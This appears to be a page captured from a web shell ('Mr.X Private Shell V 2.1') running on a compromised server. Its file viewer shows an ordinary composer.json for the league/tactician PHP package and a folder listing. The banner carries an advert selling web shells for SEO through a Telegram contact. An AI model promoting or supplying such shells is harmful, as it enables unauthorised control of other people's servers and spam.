__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{
"name": "league/tactician",
"description": "A small, flexible command bus. Handy for building service layers.",
"keywords": ["command", "command bus", "service layer"],
"license": "MIT",
"authors": [
{
"name": "Ross Tuck",
"homepage": "http://tactician.thephpleague.com"
}
],
"require": {
"php": ">=5.5"
},
"require-dev": {
"mockery/mockery": "~0.9",
"phpunit/phpunit": "^4.8.35",
"squizlabs/php_codesniffer": "~2.3"
},
"autoload": {
"psr-4": {
"League\\Tactician\\": "src"
}
},
"autoload-dev": {
"psr-4": {
"League\\Tactician\\Tests\\": "tests/"
},
"files": [
"tests/Fixtures/Command/CommandWithoutNamespace.php"
]
},
"extra": {
"branch-alias": {
"dev-master": "2.0-dev"
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| src | Folder | 0750 |
|
|
| composer.json | File | 943 B | 0640 |
|